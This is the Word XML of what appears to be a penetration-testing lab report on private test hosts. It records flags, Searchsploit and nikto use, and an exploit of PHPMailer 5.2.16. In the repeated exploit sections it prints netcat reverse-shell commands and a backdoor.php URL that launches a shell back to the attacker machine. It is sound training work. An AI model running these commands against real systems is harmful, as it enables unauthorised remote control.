    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="2FD2B152" w14:textId="09347B5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 - `flag2.txt`: ‘6a8ed560f0b5358ecf844108048eb337’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="5AC5B6D2" w14:textId="33D8973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   - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="5D3D418C" w14:textId="62777E0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     - Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Searchspolit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> to find vulnerabilities associated with PHP Mailer 5.2.16, exploited with bash script to open backdoor on target, and opened reverse shell on target with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="4C155E75" w14:textId="366E86FF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     - Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="4C57BBB4" w14:textId="79948027">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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="54FF3FED">
        <w:rPr/>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>lvmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> 4444 (start ncat listener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="431AE70F" w14:textId="4106C685">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> 192168.1.90 4444 –e /bin/bash (uses the backdoor to run bash commands on Target 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="3C5D6A30" w14:textId="53EA0159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>URL: 192.168.1.115/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>backdoor.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">=nc%20192.168.1.90%204444%20-e%20/bin/bash (navigate to this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;192.168.1.115&gt;/backdoor.php?cmd=&lt;CMD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">&gt; to run bash </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>scritps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> on Target 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="1436B4F2" w14:textId="034FE809">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>phpmailer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> (find any known vulnerabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="073A9334" w14:textId="5BDEA82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 - `flag3.txt`: 'a0f568aa9de277887f37730d711520d9b’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="686D4D74" w14:textId="262E4E5A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   - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="72BD8F39" w14:textId="0BE1F5C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4FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">      - Used shell access to search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>WOrdPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> uploads directory for Flag 3, discovered path location, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>navigatin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> to web browser to view flag3.png.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="28273603" w14:textId="3061344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     - Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> –C all –h 192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="7C5C72F7" w14:textId="50B98F49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 - `flag4.txt`: ‘6a8ed560f0b5358ecf844108048eb337’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="71A7E194" w14:textId="33D8973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   - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="034000EC" w14:textId="62777E0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     - Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Searchspolit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> to find vulnerabilities associated with PHP Mailer 5.2.16, exploited with bash script to open backdoor on target, and opened reverse shell on target with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="0341DDDD" w14:textId="366E86FF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4FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">      - Command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="70E9A56F" w14:textId="79948027">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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="54FF3FED">
        <w:rPr/>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>lvmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> 4444 (start ncat listener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="0C1A5712" w14:textId="4106C685">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> 192168.1.90 4444 –e /bin/bash (uses the backdoor to run bash commands on Target 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="53A0ED7B" w14:textId="3A3D7885">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>URL: 192.168.1.115/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>backdoor.php?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">=nc%20192.168.1.90%204444%20-e%20/bin/bash (navigate to this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;192.168.1.115&gt;/backdoor.php?cmd=&lt;CMD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve">&gt; to run bash </w:t>
      </w:r>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>scripts</w:t>
      </w:r>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> on Target 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="0614174D" w14:textId="7BBDAF29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t>phpmailer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="54FF3FED">
        <w:rPr/>
        <w:t xml:space="preserve"> (find any known vulnerabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54FF3FED" w:rsidP="54FF3FED" w:rsidRDefault="54FF3FED" w14:paraId="29E055A1" w14:textId="24474B2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98DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="57034062" w14:textId="37A347A2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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="5ED3BDC9" w14:textId="5E4040D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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="09DF4541" w14:textId="7F67C426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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="07C1A222" w14:textId="7CD00139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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="27AC52F7" w14:textId="79C942AC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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="288D914E" w14:textId="21C63C67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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="356AEAFE" w14:textId="470962B5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360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29B5BE6"/>
    <w:rsid w:val="2423A867"/>
    <w:rsid w:val="498DE0C0"/>
    <w:rsid w:val="535848FC"/>
    <w:rsid w:val="54FF3FED"/>
    <w:rsid w:val="629B5BE6"/>
    <w:rsid w:val="6E28B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9B5BE6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E5B2EC93-11F1-4359-B2CA-AD8A05C017E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6597e08849d34209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R8b33d2895cf24530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.110/wordpress" TargetMode="External" Id="Rfee361889e34457d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R3e79a10575be4a24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rd913069a75084309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R7998c4fb12574bf2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R8be8029771324557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="R5d4b240828f0487b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="Rcf179c9e233d4e08" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="Rc906fe3577ef4d00" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="R0d185bf0e3a24221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R9b5f537a2e9747c2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="R1cd86625a16d4d66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="R98d27a19ee324980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="Rbd033ff5c2fa4502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="Rd552eb3a67604d2e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-15710" TargetMode="External" Id="Reabeb119a2754bd8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-8779" TargetMode="External" Id="R839d61d82d8244c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-10745" TargetMode="External" Id="R1cfc21e9bc4b483a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="Rffed1a24769c4250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="Rc1696f4a8df647c8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1c.png" Id="Rd2d410ecf0ab4645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-15710" TargetMode="External" Id="R98c975bdffa1434c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-8779" TargetMode="External" Id="R08e2bfae36a8484d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-10745" TargetMode="External" Id="R370e1a629f8046bc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="R4ebafca18682432a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:michael@192.168.1.110" TargetMode="External" Id="Re9b578ccbc5f41c6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1e.png" Id="R804857d659d34114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:steven@192.168.1.110" TargetMode="External" Id="R31297b6503fa46da" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="R90fb2a55d8aa40bd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="Rdc17d8acdad14ce3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image21.png" Id="Rc2616e31d94b4e8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2022-05-16T00:50:03.3227705Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-19T15:53:26.9874633Z</dcterms:modified>
  <dc:creator>Lauren Evans</dc:creator>
  <lastModifiedBy>Lauren Evans</lastModifiedBy>
</coreProperties>
</file>